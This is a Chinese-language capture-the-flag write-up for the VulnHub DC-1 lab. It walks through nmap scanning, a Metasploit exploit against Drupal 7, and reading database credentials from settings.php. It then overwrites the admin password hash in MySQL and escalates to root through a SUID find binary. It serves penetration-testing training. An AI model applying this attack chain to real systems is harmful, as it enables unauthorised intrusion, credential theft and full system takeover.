DC-1靶场实验过程

一、环境搭建:

1、靶机描述

DC-1是一个专门建立的脆弱实验室,目的是获得渗透测试领域的经验。它是为初学者设计的挑战,但它到底有多容易取决于你的技能和知识,以及你的学习能力。要成功完成这一挑战,您需要掌握Linux技能,熟悉Linux命令行,并具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。有多种方法可以获得根,但是,我为初学者提供了一些包含线索的标志。总共有五个flag,但最终目标是在根的主目录中找到并读取标志。您甚至不需要成为根用户来执行此操作,但是,您将需要根权限。根据您的技能水平,您可以跳过寻找大多数这些标志,然后继续直。初学者可能会遇到他们以前从未遇到过的挑战,但是谷歌搜索应该是获得完成这个挑战所需的信息所必需的。

根据描述信息我们可以知道本靶场环境总共有5个flag。

2、下载靶场环境

    靶场下载地址:

DC: 1 ~ VulnHub

二、渗透靶场

1.目标:

目标就是我们搭建的靶场,靶场IP为:XXX.XXX.XXX.XXX/24

2.先确认kali的ip地址

命令:Ipconfig

3.寻找靶机真实IP

nmap -sP 1 XXX.XXX.XXX.XXX /24

4、信息收集:探端口及服务

nmap -A -p- -v 192.168.136.129

-A 综合性扫描

-v 冗余模式。推荐使用这个选项,它给出扫描过程中的详细信息

访问web站点

发现是一个电信的drupal服务,根据nmap结果可知当前运行的是Drupal 7的CMS

searchsploit  drupal 7

还可以在百度上搜一下相关版本漏洞

5.进入MSF控制台

命令:msfconsole

MSF简单命令介绍

msfconsole 进入MSF控制台

search 搜索相应模块

use            对应模块

show options   查看信息

set RHOST   远程主机ip

run            攻击

进入MSF控制台搜索drupal模块

进入MSF控制台msfdb run

搜索drupal模块search drupal

6、用2018的测试

7.设置靶机IP运行msf

执行whoami

发现是www-date权限

进入home目录,发现flag4.txt文件

我们使用python进行反弹

python -c "import pty;pty.spawn('/bin/bash')"

查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件

8、 Drupal的默认配置文件为

/var/www/sites/default/settings.php

查看文件内容

cat /var/www/sites/default/settings.php

 发现了flag2和数据库的账号密码

flag2提示,提升权限为root来查看敏感文件

我们先进入数据库查看

'username' => 'dbuser',

'password' => 'R0ck3t',

mysql -u dbuser -p

查看数据库,切换到drupaldb数据库

9、查看默认的Drupal user 表

解决方法:置换drupal密码

10、进入www目录

站点路径下执行php scripts/password-hash.sh 新密码

11、在进入数据库中把密码字段进行替换
进入mysql,输入密码,切换到drupaldb数据库

mysql -u dbuser -pR0ck3t

use drupaldb

将pass字段进行替换

update users set pass=" $S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw " where name="admin";

update users set pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where name="admin";

12、登录站点

访问站点

进行登录,密码是之前我们替换的

admin

123

成功登录

13、.发现flag3

 登陆战点之后,随便翻一番,发现flag3,

http://192.168.66.140/node#overlay=admin/content

  点击flag3进入,发现提示信息

使用命令查看 suid 权限的可执行二进制程序

find / -perm -4000 2>/dev/null

发现find命令

使用命令测试,发现为root权限

命令:touch 123

ls

find / -name 123 -exec "whoami" \;

14、.发现最后的flag文件

命令:find ./ -name 123 -exec "/bin/sh" \;   

whoami

ls

cd /root

ls

查看cat thefinalflag.txt文件

QDCAU7

大致就是说你已经通过了本关卡。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值